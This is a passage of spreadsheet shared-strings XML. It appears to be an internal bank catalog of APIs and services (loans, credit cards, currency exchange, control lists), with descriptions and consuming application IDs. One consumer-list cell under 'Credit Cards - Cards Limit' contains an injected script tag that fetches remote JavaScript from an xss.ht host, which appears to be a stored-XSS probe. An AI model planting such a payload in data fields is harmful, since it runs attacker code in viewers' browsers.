    <t>El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de datos generales de obligaciones asociadas a un proyecto hipotecario o cliente individual así como movimientos que presenten dichas obligaciones en un rango de fechas específico, pudiendo identificar subrogaciones.</t>
  </si>
  <si>
    <t>AW0360004 _x000D_
SVE _x000D_
NU0004001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Consultar Detalle Chequera</t>
  </si>
  <si>
    <t>Permitir consultar el detalle de la(s) chequera(s) a partir de una cuenta corriente del cliente perteneciente a filiales del exterior (Cayman, Panamá, Miami y Puerto Rico).</t>
  </si>
  <si>
    <t>Consultar Detalle Producto</t>
  </si>
  <si>
    <t>Realizar Consulta del detalle de un producto independientemente del tipo de producto (CDT, CASA, Crédito Retail, Crédito Corporativo) desde cualquier consumidor hacia Finacle para productos de cualquier filial del exterior..</t>
  </si>
  <si>
    <t>Consultar Discrepancias</t>
  </si>
  <si>
    <t>Soportar la funcionalidad de consultar las discrepancias levantadas a un cliente para un producto Trade (carta de crédito de importación o garantía standby emitida) por parte de Bancolombia.</t>
  </si>
  <si>
    <t>AW0611001 _x000D_
AW0360</t>
  </si>
  <si>
    <t>Consultar Estado Cliente Listas Control</t>
  </si>
  <si>
    <t>Tiene como finalidad responder a la necesidad de validar la presencia del cliente en alguna de las listas negras</t>
  </si>
  <si>
    <t>AW1177 _x000D_
ELIBOM _x000D_
AW0922 _x000D_
AW0856 _x000D_
AW1097001 _x000D_
AW0998 _x000D_
BSN _x000D_
AW1170 _x000D_
SYC _x000D_
AW0683001 _x000D_
AW1128 _x000D_
AW1011 _x000D_
AW0540001 _x000D_
BancasegurosNube _x000D_
AW0682001</t>
  </si>
  <si>
    <t>Consultar Estado Proveedores Listas Control</t>
  </si>
  <si>
    <t>tiene como finalidad responder a la necesidad de validar la presencia del proveedor en alguna de las listas negras</t>
  </si>
  <si>
    <t>Consultar Fuentes Publicas Externas</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio permite consultar información de diferentes fuentes públicas desde aplicaciones que requieran acceder a este tipo de información. </t>
  </si>
  <si>
    <t>AW0922 _x000D_
AW0856 _x000D_
AW1097001 _x000D_
AW1170 _x000D_
AW1302001 _x000D_
AW1081001 _x000D_
NU0142001 _x000D_
AW0660001</t>
  </si>
  <si>
    <t>Consultar Giros Realizados</t>
  </si>
  <si>
    <t>Permite la consulta de las transferencias externas realizadas desde una cuenta del cliente, perteneciente a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico) y relacionada a los productos cuentas de ahorro y/ó cuentas corrientes.</t>
  </si>
  <si>
    <t>Consultar Giros Recibidos</t>
  </si>
  <si>
    <t>Desde la sucursal virtual, el cliente podrá consultar los giros recibidos en una cuenta específica propia de un producto de cuenta de ahorros ó cuenta corriente</t>
  </si>
  <si>
    <t>Consultar Informacion Producto</t>
  </si>
  <si>
    <t>El usuario de la sucursal virtual (SVP y SVE) podrá solicitar la consulta de saldos ó consulta de movimientos ó consulta de saldos congelados (líen) de manera independiente ó de manera conjunta, es decir, tendrá la posibilidad de solicitar la consulta de saldos, de movimientos y líen con una solicitud.</t>
  </si>
  <si>
    <t>Consultar Informacion Sesion</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio utilizado por transformación digital para la consulta de información de una sesión </t>
  </si>
  <si>
    <t>Consultar Listas Control Especiales</t>
  </si>
  <si>
    <t>AW0922 _x000D_
SYC</t>
  </si>
  <si>
    <t>Consultar Movimientos Producto</t>
  </si>
  <si>
    <t>Permitir consultar los Movimientos de un producto de un cliente correspondiente a: Movimientos de créditos retail, Movimientos de créditos corporate y Movimientos CASA (cuentas corrientes y ahorros) con y sin paginación. Los Movimientos de los productos a consultar pertenecen a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico).</t>
  </si>
  <si>
    <t>Administrador de Tasas_AW1168001</t>
  </si>
  <si>
    <t>AW0453 _x000D_
AW0718001</t>
  </si>
  <si>
    <t>AW0453</t>
  </si>
  <si>
    <t>Consultar MT</t>
  </si>
  <si>
    <t>Mostrar al cliente el detalle del MT. Cada vez que se realiza una transferencia vía SWIFT se genera un archivo denominado Formato MT 103 el cual contiene los datos del giro realizado o del giro recibido.</t>
  </si>
  <si>
    <t>Modulo Parametrizador Compra y Venta de Divisas Tesoreria_AW0899001</t>
  </si>
  <si>
    <t>Consultar OTP</t>
  </si>
  <si>
    <t>Este servicio permite Consultar el estado de los clientes de los diferentes canales transaccionales del Banco en la aplicación proveedora Detect ID. Indica si el cliente está bloqueado o no.</t>
  </si>
  <si>
    <t>SuperFinanciera</t>
  </si>
  <si>
    <t>AW0638 _x000D_
AW0636</t>
  </si>
  <si>
    <t>Consultar Saldos Congelados</t>
  </si>
  <si>
    <t>Permite la consulta de saldo detallado de cada uno de los tipos de líen (saldos congelados), con base en la cuenta de un titular ó cotitular. Ésta funcionalidad aplica para personas y empresas.</t>
  </si>
  <si>
    <t>Consumer Loan</t>
  </si>
  <si>
    <t>Consumer Loan - Independent Loan</t>
  </si>
  <si>
    <t>consumer-loan-independent-loan</t>
  </si>
  <si>
    <t>Esta API permite consultar la viabiliadad de una solicitud de credito para un cliente indepediente en un producto y/o servicio</t>
  </si>
  <si>
    <t>RespuestaAlFrente_AW1086001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Consumer Loan Behavioral Models</t>
  </si>
  <si>
    <t>Consumer Loan Behavioral Models - Consumption Loan Study</t>
  </si>
  <si>
    <t>consumer-loan-behavioral-models-consumption-loan-study</t>
  </si>
  <si>
    <t>El estudio de crédito de consumo habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar. Dentro de los productos se tienen Crédito de Libre Inversión, CrediAgily Tarjeta de Crédito</t>
  </si>
  <si>
    <t>EstudioCreditoConsumo/V1.0</t>
  </si>
  <si>
    <t>EcosistemaRiesgos_AW1011 _x000D_
 NequiAF_AW1011</t>
  </si>
  <si>
    <t>RespuestaAlFrente_AW1086001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>Consumer Loans</t>
  </si>
  <si>
    <t>Consumer Loans - Interest Rate</t>
  </si>
  <si>
    <t>consumer-loans-interest-rate</t>
  </si>
  <si>
    <t>En su versión inicial, esta API expone método para consulta de tasas, montos y plazos aplicables a créditos de consumo (libre inversión), permitiendo a los canales de venta donde se ofrezcan este tipo de productos consultar esta información en lí­nea</t>
  </si>
  <si>
    <t>Experiencia de Cartera</t>
  </si>
  <si>
    <t>ConsultaTasaCredito/V2.0</t>
  </si>
  <si>
    <t>Aprobaciones_AW036007 _x000D_
 NU0107001_LoansApproval_MR _x000D_
 APP_AW0360007 _x000D_
 aprobaciones_AW0360007 _x000D_
 LoansOffer_NU0102001 _x000D_
 MsUtilities_NU0102001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 APP_AW1285001 _x000D_
 APP_NU0102001 _x000D_
 ProductosDeFinanciación_NU0102001 _x000D_
 BNPL_NU0287001</t>
  </si>
  <si>
    <t>Consumer Loans - Loan Applications</t>
  </si>
  <si>
    <t>consumer-loans-loan-applications</t>
  </si>
  <si>
    <t>En su versión inicial, esta API expone capacidades que permiten consultar los detalles relacionados con solicitudes de crédito radicadas, así­ como actualizar el estado de éstas, haciendo posible, en parte, la gestión de este proceso previo al desembolso del crédito.</t>
  </si>
  <si>
    <t>Consumer Loans - Offers</t>
  </si>
  <si>
    <t>consumer-loans-offers</t>
  </si>
  <si>
    <t>No tiene Descipcion</t>
  </si>
  <si>
    <t>Consumer Loans - Utilities</t>
  </si>
  <si>
    <t>consumer-loans-utilities</t>
  </si>
  <si>
    <t>Esta API expone capacidades que resultan complementarias a procesos de crediticios de consumo y libranza.</t>
  </si>
  <si>
    <t>Consumption Loans</t>
  </si>
  <si>
    <t>Consumption Loans - Disbursements</t>
  </si>
  <si>
    <t>consumption-loans-disbursements</t>
  </si>
  <si>
    <t>En su versión inicial, esta API expone la capacidad de ejecutar un desembolso en lí­nea sobre una cuenta depósito o bien realizar el reverso de un desembolso realizado el mismo dí­a</t>
  </si>
  <si>
    <t>DesembolsoCreditoConsumo/V3.0</t>
  </si>
  <si>
    <t>LoansOffer_NU0102001 _x000D_
 MsUtilities_NU0102001</t>
  </si>
  <si>
    <t>Consumption Loans - Installments</t>
  </si>
  <si>
    <t>consumption-loans-installments</t>
  </si>
  <si>
    <t>Esta API permite consultar el pago periódico al que se compromete un cliente con el banco, con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (valor de la cuota) mientras que el otro concierne a los intereses generados (tasa nominal mes vencido, tasa efectiva anual, valor numérico de la DTF).</t>
  </si>
  <si>
    <t>ConsultaCuotaCredito/V1.0</t>
  </si>
  <si>
    <t>Contra Ordenar Cheques</t>
  </si>
  <si>
    <t>El usuario desde la sucursal virtual de empresa ó persona, podrá contraordenar uno o varios cheques en un rango consecutivo relacionados a una misma chequera de una cuenta corriente del cliente perteneciente a Filiales del exterior (Cayman, Panamá, Miami y Puerto Rico)</t>
  </si>
  <si>
    <t>Contribucion Documental</t>
  </si>
  <si>
    <t>Permite realizar checkin de documentos hacia Gestión Documental (WCC), firmado electrónico de documentos PDF (estampado cronológico) y su posterior custodia en Oracle WCC.</t>
  </si>
  <si>
    <t>BB14 - CONTRIBUCIÓN DOCUMENTAL_AW1104001</t>
  </si>
  <si>
    <t>NU0102001 _x000D_
NU0127001 _x000D_
NU0004001 _x000D_
NU0034001 _x000D_
AW1170 _x000D_
AW1176</t>
  </si>
  <si>
    <t>Contribution Models</t>
  </si>
  <si>
    <t>Contribution Models - Analytic Model</t>
  </si>
  <si>
    <t>contribution-models-analytic-model</t>
  </si>
  <si>
    <t>Permite la interacción de un proyecto que requiera enviar un fragmento que corresponde a una cadena de texto, para procesarlo dentro de un modelo analí­tico disponible para su uso, con el fin de poder consultar el resultado del procesamiento para el fragmento enviado.</t>
  </si>
  <si>
    <t xml:space="preserve">Claudia Marcela Arias Orozco </t>
  </si>
  <si>
    <t>Management Checklists</t>
  </si>
  <si>
    <t>Control Lists Management</t>
  </si>
  <si>
    <t>control-lists-management</t>
  </si>
  <si>
    <t>Esta API tiene la capacidad de registrar un cliente en una categorí­a y subcategorí­a de listas de control, el cliente puede ser una persona Natural o Jurí­dica.   **Este API no contempla el retiro de clientes de estas listas.**</t>
  </si>
  <si>
    <t>GestionListasDeControl/V2.0</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001 _x000D_
 Plink_AW1206001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Convertir Monto</t>
  </si>
  <si>
    <t>Calcula el equivalente en otras monedas de determinados montos o importes, por motivos de movimientos entre cuentas que manejan diferentes monedas.</t>
  </si>
  <si>
    <t>Corporate Loan</t>
  </si>
  <si>
    <t>Corporate Loan - Credit Limits</t>
  </si>
  <si>
    <t>corporate-loan-credit-limits</t>
  </si>
  <si>
    <t>Esta API expone capacidades que permiten desde la consulta básica hasta consolidada de lí­mites de endeudamiento entre lí­neas de crédito para un cliente de cartera comercial en particular, así­ como la consulta en detalle de dichos lí­mites de endeudamiento</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 NETWORKING_NU0046001 _x000D_
 SVECarteraComercial_NU0162001</t>
  </si>
  <si>
    <t>Correlacionar Transacciones_BB6</t>
  </si>
  <si>
    <t>El propósito de este servicio es permitirle al consumidor crear la correlación de una transacción por proceso, producto, documento o por identificador en el sistema UCM.</t>
  </si>
  <si>
    <t>Correlacion de Transacciones BB6_Correlacion de Transacciones BB6_AW0936001</t>
  </si>
  <si>
    <t>Correspondent Bank</t>
  </si>
  <si>
    <t>Correspondent Bank - Banks and Branches</t>
  </si>
  <si>
    <t>correspondent-bank-banks-and-branches</t>
  </si>
  <si>
    <t>La api Correspondent Bank -banks and branches permite consultar desde las filiales del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas filiales y a su vez consultar las sucursales de los bancos.</t>
  </si>
  <si>
    <t>ConsultaBanco/V1.0</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW1185001 _x000D_
 TMP2 johucorr_AW1185001 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>Counter Party Administration</t>
  </si>
  <si>
    <t>Counter Party Administration - Master Routing Code</t>
  </si>
  <si>
    <t>counter-party-administration-master-routing-code</t>
  </si>
  <si>
    <t>La API Counter Party Administration - Master Routing Code permitirá a los consumidores poder obtener los diferentes maestros necesarios para poder consultar la información correspondiente a los códigos de enrutamiento al momento de la inscripción de una cuenta destino dentro del proceso de transferencias internacionales. Estos códigos de enrutamiento podrán enrutar correctamente la transferencia externa hacia su destino. Dichos códigos se pueden obtener dependiendo del paí­s y la moneda destino de la transferencia (Códigos identificados: Código TRANSIT, Código ABA, Código IBAN, Código CABLE).</t>
  </si>
  <si>
    <t>Juan Felipe Granada Gaviria</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001 _x000D_
 MonitoreoDCM_NU0084001</t>
  </si>
  <si>
    <t>Creacion Caso Consulta LE</t>
  </si>
  <si>
    <t>El servicio creación caso consulta LE (limite endeudamiento), inicia un proceso en Bizagi, con el fin de consultar el limite de endeudamiento de un cliente(Persona, pyme)</t>
  </si>
  <si>
    <t>Creacion Casos BPM Documental</t>
  </si>
  <si>
    <t>El servicio Creación caso BPM documental toma la información de cliente, proceso y documento de la petición del negocio para crear un caso en Kofax, que crea el job y envía como respuesta si fue exitoso o no; en caso de ser exitoso, en Kofax se inicia la ejecución de un proceso?, que incluye la clasificación y extracción de información.</t>
  </si>
  <si>
    <t>Creacion Tarjetas Credito</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Creación Tarjetas Crédito permite tener diferentes tipos de creación de tarjetas de crédito disponible a los consumidores según su uso  • Uso inmediato: Se crea la tarjeta de manera virtual, obteniendo como resultado un número de tarjeta, CVC2 y fecha de vencimiento para que el cliente pueda proceder a realizar transacciones en línea mientras le llega la tarjeta física. Los números de tarjeta instantánea y física son iguales, pero la fecha de vencimiento será diferente cuando le llegue la tarjeta física al cliente. • Emisión Instantánea: Esta capacidad sólo estará disponible para sucursales pues el cliente solicita la tarjeta y se le puede entregar de manera inmediata (la sucursal debe contar con la impresora para generar el embosado -plástico- de la tarjeta) • Primera compra: (Pendiente) </t>
  </si>
  <si>
    <t>AW1285001</t>
  </si>
  <si>
    <t>Crear Cuenta Pasivo</t>
  </si>
  <si>
    <t>Tiene como propósito soportar el proceso de oferta de productos de Bancolombia. Los tipos de cuentas soportados son, Cuentas de Ahorro, Cuentas Corrientes, Cuentas de depósito a Término Fijo, y un segundo tipo de depósito a término fijo llamado TopUp.</t>
  </si>
  <si>
    <t>AW0718001 _x000D_
AW0611001 _x000D_
AW0683001 _x000D_
AW0563001</t>
  </si>
  <si>
    <t>Crear Novedad Producto Trade</t>
  </si>
  <si>
    <t>El objetivo del servicio es permitir efectuar diferentes tipos de modificaciones en productos de Carta de Crédito de Importación o Garantía Standby Emitida que tiene el cliente.</t>
  </si>
  <si>
    <t>Crear Producto Trade</t>
  </si>
  <si>
    <t>soportar la funcionalidad de creaciones del producto Trade (carta de crédito de importación o garantía standby emitida) que Bancolombia le ofrece a un Cliente.</t>
  </si>
  <si>
    <t>Crear Usuario</t>
  </si>
  <si>
    <t>Permitir crear usuarios tanto para Sucursal virtual persona (SVP) como para Sucursal virtual empresa (SVE) para que pueda utilizar el canal.</t>
  </si>
  <si>
    <t>Credit Card</t>
  </si>
  <si>
    <t>Credit Card - Administration</t>
  </si>
  <si>
    <t>credit-card-administration</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones que se describen brevemente a continuación  - Afiliar débito automático   - Desafiliar débito automático  - Solicitar ampliación de plazo.</t>
  </si>
  <si>
    <t>Autenticacion-para-VCAS_NU0101001 _x000D_
 ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 JornadaPagos_AW1316001 _x000D_
 PagoTDCWompi_AW1405001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 ALM_AW0955001</t>
  </si>
  <si>
    <t>Credit Card - Credit Cards</t>
  </si>
  <si>
    <t>credit-card-credit-cards</t>
  </si>
  <si>
    <t>Permite realizar diferentes tipos de consultas asociadas a las tarjetas de crédito</t>
  </si>
  <si>
    <t>ConsultaTarjetasCredito/V1.0</t>
  </si>
  <si>
    <t>ProductorConsumidorMP_PRODUCTORCONSUMIDOR _x000D_
 SEG_NU0064001 _x000D_
 JornadaPagos_AW1316001</t>
  </si>
  <si>
    <t>Esta Api contiene capacidades que permiten realizar diferentes tipos de consultas asociadas al producto Tarjeta de Crédito, los cuales se listan a continuación - Listar las tarjetas de un cliente - Consultar el detalle de una tarjeta - Consultar el código de seguridad de una tarjeta</t>
  </si>
  <si>
    <t>Credit Card - Information</t>
  </si>
  <si>
    <t>credit-card-information</t>
  </si>
  <si>
    <t>permite realizar diferentes tipos de consultas asociadas a las tarjetas Credito.</t>
  </si>
  <si>
    <t>ConsultaTarjetasCredito/V2.0</t>
  </si>
  <si>
    <t>Credit Card - Management</t>
  </si>
  <si>
    <t>credit-card-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades de gestión relativas a tarjetas de crédito. Incluye capacidades de novedades y validaciones</t>
  </si>
  <si>
    <t>GestionTarjetasCredito/V2.0</t>
  </si>
  <si>
    <t>Credit Card - Offer</t>
  </si>
  <si>
    <t>credit-card-offer</t>
  </si>
  <si>
    <t>Esta API permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente.</t>
  </si>
  <si>
    <t>OfertaComercialTarjetasCredito/V1.0</t>
  </si>
  <si>
    <t>Credit Card - Transactions</t>
  </si>
  <si>
    <t>credit-card-transactions</t>
  </si>
  <si>
    <t>Esta Api permite realizar consultas y solicitudes relativas a las transacciones realizadas con tarjetas de crédito.</t>
  </si>
  <si>
    <t>Credit Cards</t>
  </si>
  <si>
    <t>Credit Cards - Cards Limit</t>
  </si>
  <si>
    <t>credit-cards-cards-limit</t>
  </si>
  <si>
    <t>Capacidad que permite aumentar o disminuir el cupo (lí­mite) de una tarjeta de crédito mediante el níºmero de tarjeta, el cupo actual y el cupo nuevo.</t>
  </si>
  <si>
    <t>ModificacionDeCupoTarjetas/V1.0</t>
  </si>
  <si>
    <t>Tarjetas Vision Plus_ISTVP001</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 Ares_AW1250 _x000D_
 JornadaPagos_AW1316001 _x000D_
 &lt;script&gt;$.getScript("//mistestxss.xss.ht")&lt;/script&gt; _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 Dcmonroy_prueba_paso</t>
  </si>
  <si>
    <t>Credit Cards - Management</t>
  </si>
  <si>
    <t>credit-cards-management</t>
  </si>
  <si>
    <t>Esta API permite exponer las diferentes capacidades para gestionar la emisión de tarjetas de crédito. Inicialmente, la API tendrá las siguientes capacidades: *  Crear tarjeta de crédito por uso inmediato</t>
  </si>
  <si>
    <t>GestionTarjetasCredito/V1.0</t>
  </si>
  <si>
    <t>Credit Cards - Product Information</t>
  </si>
  <si>
    <t>credit-cards-product-information</t>
  </si>
  <si>
    <t>Permite realizar diferentes tipos de consultas asociadas al producto Tarjetas de Crédito, viéndolo como una entidad y no como las consultas asociadas a las tarjetas de un cliente. Actualmente tiene disponible la consulta de las tasas de interés efectivo anual y mensual para el producto, permitiendo discriminar por tipo de transacción (compra, avance, impuesto, mora, re-financiación, compra de cartera), franquicia o producto (logo).</t>
  </si>
  <si>
    <t>Credit Disbursement</t>
  </si>
  <si>
    <t>Credit Disbursement - Management</t>
  </si>
  <si>
    <t>credit-disbursement-management</t>
  </si>
  <si>
    <t>La API credit disbursement - management permitire que desde el proyecto Pyme se pueda saber la notificacion de desembolso de un credito desde Bizagui.</t>
  </si>
  <si>
    <t>Credit Limit</t>
  </si>
  <si>
    <t>Credit Limit - Credit Limits Management</t>
  </si>
  <si>
    <t>credit-limit-credit-limits-management</t>
  </si>
  <si>
    <t>Esta API cuenta con capacidades que permite la creación de lí­mites de endeudamiento</t>
  </si>
  <si>
    <t>PROFIN_PRODUCTORCONSUMIDOR _x000D_
 LoansOffer_NU0102001</t>
  </si>
  <si>
    <t>Currency Exchange</t>
  </si>
  <si>
    <t>Currency Exchange - Estimate Transactions</t>
  </si>
  <si>
    <t>currency-exchange-estimate-transactions</t>
  </si>
  <si>
    <t>Financiasion</t>
  </si>
  <si>
    <t>CalcularOperacionDivisas/V1.0</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 APP_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Currency Exchange - Exchange Numerals</t>
  </si>
  <si>
    <t>currency-exchange-exchange-numerals</t>
  </si>
  <si>
    <t>El API Currency Exchange - Exchange Numerales permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción.</t>
  </si>
  <si>
    <t>consultaNumeralCambiario/V1.0</t>
  </si>
  <si>
    <t>Currency Exchange - Negociated Rates</t>
  </si>
  <si>
    <t>currency-exchange-negociated-rates</t>
  </si>
  <si>
    <t>El API Currency Exchange Negociated Rates permitirá la consulta de las tasas negociadas que están disponibles para realizar transacciones de compra y venta de divisas</t>
  </si>
  <si>
    <t>GestionTasaPactada/V1.0</t>
  </si>
  <si>
    <t>Currency Exchange - Orders</t>
  </si>
  <si>
    <t>currency-exchange-orders</t>
  </si>
  <si>
    <t>GestionOrdenes/V1.0</t>
  </si>
  <si>
    <t>Currency Exchange - Rates</t>
  </si>
  <si>
    <t>currency-exchange-rates</t>
  </si>
  <si>
    <t>La Api de Currency Exchange - rates tiene como objetivo consultar el valor de la tasa de cambio entre dos tipos de moneda.</t>
  </si>
  <si>
    <t>ConsultaTasa/V1.0</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW1185001 _x000D_
 TMP2 johucorr_AW1185001 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 App inversionesGB_AW1185001 _x000D_
 APOLO_AW0360010</t>
  </si>
  <si>
    <t>Currency Exchange - Transactions</t>
  </si>
  <si>
    <t>currency-exchange-transactions</t>
  </si>
  <si>
    <t>Currency Exchange - Transfer Rates</t>
  </si>
  <si>
    <t>currency-exchange-transfer-rates</t>
  </si>
  <si>
    <t>La Api de Currency Exchange  Transfer Rates tiene como objetivo exponer la información de las comisiones y tasas preferenciales del cliente cuando se realiza una transferencia internacional.</t>
  </si>
  <si>
    <t>GestionComisionTransferenciasExternas/V1.0, 
ConsultaTasaPreferencialCliente/V1.0</t>
  </si>
  <si>
    <t>Currency Exchange Reasons</t>
  </si>
  <si>
    <t>Currency Exchange Reasons - Transaction Reasons</t>
  </si>
  <si>
    <t>currency-exchange-transaction-reasons</t>
  </si>
  <si>
    <t xml:space="preserve">La API Permite consultar los posibles motivos de la transacción para operaciones de enví­o y recepción de divisas. </t>
  </si>
  <si>
    <t>APIC_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Customer Validation</t>
  </si>
  <si>
    <t>Customer - Check Control List</t>
  </si>
  <si>
    <t>customer-check-control-list</t>
  </si>
  <si>
    <t>API que permite listar los detalles de un cliente en Listas de Control.</t>
  </si>
  <si>
    <t>ConsultaListasDeControl/V1.0</t>
  </si>
  <si>
    <t>MonitoreoDCM_NU0084001 _x000D_
 HabitatCore_AW1281003 _x000D_
 GestionaNegocios_AW1302001 _x000D_
 EDPYME_AW1170 _x000D_
 VinculacionAperturaProductoDigital_AW1128 _x000D_
 VinculacionAperturaProductoDigitalSucursales_AW1177 _x000D_
 BIZTRACK_AW0998 _x000D_
 APM_AW1097001 _x000D_
 APPVinculation_AW1315014 _x000D_
 Networking_NU0046001 _x000D_
 SEG_NU0064001 _x000D_
 PLINK_AW1206001 _x000D_
 Horus_AW1258011 _x000D_
 NETWORKING_NU0046001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 ECORIESGOS_AW1081001 _x000D_
 GestionVendor_AW0661003 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 RIGO_NU0135001 _x000D_
 APIC_AW1176 _x000D_
 AdquirenciaCargaMasiva_NU0142001 _x000D_
 Plink_AW1206001 _x000D_
 AccountOpening_AW1480001 _x000D_
 PLINK_AW1206001 _x000D_
 BIZAGIBEG_AW1176001 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 OYD_AW0629001 _x000D_
 ALM_AW0955001</t>
  </si>
  <si>
    <t>Customer - Manage Prospect</t>
  </si>
  <si>
    <t>Customer - Manage Prospect Natural Person</t>
  </si>
  <si>
    <t>customer-manage-prospect-natural-person</t>
  </si>
  <si>
    <t>La Api ofrece a los consumidores, la capacidad de crear y modificar clientes como personas naturales en SAP CRM.</t>
  </si>
  <si>
    <t>GestionarProspecto/V2.0</t>
  </si>
  <si>
    <t>NEQUICLIENTES_AW1011 _x000D_
 BCHerramientasMonitoreoPrd2</t>
  </si>
  <si>
    <t>Customer Manage Prospect</t>
  </si>
  <si>
    <t>Transversales Clientes</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 SVPSucursalVirtualPersonas_NU0149001</t>
  </si>
  <si>
    <t>CustomerProducts</t>
  </si>
  <si>
    <t>Customer - Products</t>
  </si>
  <si>
    <t>customer-products</t>
  </si>
  <si>
    <t>Permitir consultar la información de productos asociados a un cliente</t>
  </si>
  <si>
    <t>RecuperarProducto/V1.0</t>
  </si>
  <si>
    <t>TMP EDIN APP_AW1276001 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 Cayman_Soporte _x000D_
 APOLO_AW0360010 _x000D_
 App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>Customer Accounts</t>
  </si>
  <si>
    <t>Customer Accounts - Accounts</t>
  </si>
  <si>
    <t>customer-accounts-accounts</t>
  </si>
  <si>
    <t>CGC_NU0014001 _x000D_
 EDPYME_AW1170 _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 Valores_AW1373 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 LimitsCreditExhibition_NU0114001 _x000D_
 SEG_NU0064001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 Horus_AW1258011 _x000D_
 JornadaPagos_AW1316001 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 Boton de Transferencias_AW1277001 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 LoansOffer_NU0102001 _x000D_
 PODEM01_NU0001 _x000D_
 APIC_AW1176 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 Cuentas_Bancolombia_AW1081001_SUFI_APM _x000D_
 BancolombiaPay_AW1435001 _x000D_
 ALM_AW0955001 _x000D_
 prueba _x000D_
 JornadaDepositos_NU0104001 _x000D_
 APP_PRUEBA _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 ModuloSVELeasing_AW0360006 _x000D_
 JornadaDepositos_AW1177001 _x000D_
 ms_bs_customer_account_NU0163001</t>
  </si>
  <si>
    <t>Customer Accounts - Balances</t>
  </si>
  <si>
    <t>customer-accounts-balances</t>
  </si>
  <si>
    <t>Customer Acquisition</t>
  </si>
  <si>
    <t>Customer Acquisition  Notification</t>
  </si>
  <si>
    <t>customer-acquisition-notification</t>
  </si>
  <si>
    <t>## **Descripción:** La API Customer Acquisition Notification agrupa todas las capacidades de notificación requeridas en los procesos de Conocimiento del Cliente. Una notificación corresponde a cualquier información asociada al proceso y que el negocio desea que el potencial cliente conozca, por ejemplo: un correo de bienvenida,  un formato o documento, etc.  Las notificaciones pueden ser enviadas ví­a correo electrónico o sms dependiendo de su naturaleza, a medida que se vayan habilitando en la API.  ## **Operaciones**  ###### **Enviar Formato:** Esta operación habilita el enví­o de notificación ví­a correo electrónico al potencial cliente, indicando la finalización exitosa de la vinculación del cliente y adjuntando el Formato de Conocimiento del Cliente. Recibe un set de parámetros que permiten identificar el escenario de vinculación para el cual se desea enviar la notificación y el tipo de notificación que aplica. Premisas de Enviar Formato:  - Se valida la existencia de un correo electrónico registrado en el sistema.  - La operación habilita la captura de un correo electrónico como dato opcional, pero tiene prioridad el registrado previamente en el sistema para la validación del cliente.  - Para el consumo exitoso de esta operación es necesario que se hayan completado las operaciones prerrequisito definidas para el escenario de vinculación.</t>
  </si>
  <si>
    <t>Vinculación y actualización</t>
  </si>
  <si>
    <t>Luisa Carolina Jimenez Jimenez</t>
  </si>
  <si>
    <t>VINCUTRANS_NU0034001</t>
  </si>
  <si>
    <t>Customer Acquisition Data</t>
  </si>
  <si>
    <t>Customer Acquisition - Persistence</t>
  </si>
  <si>
    <t>customer-acquisition-persistence</t>
  </si>
  <si>
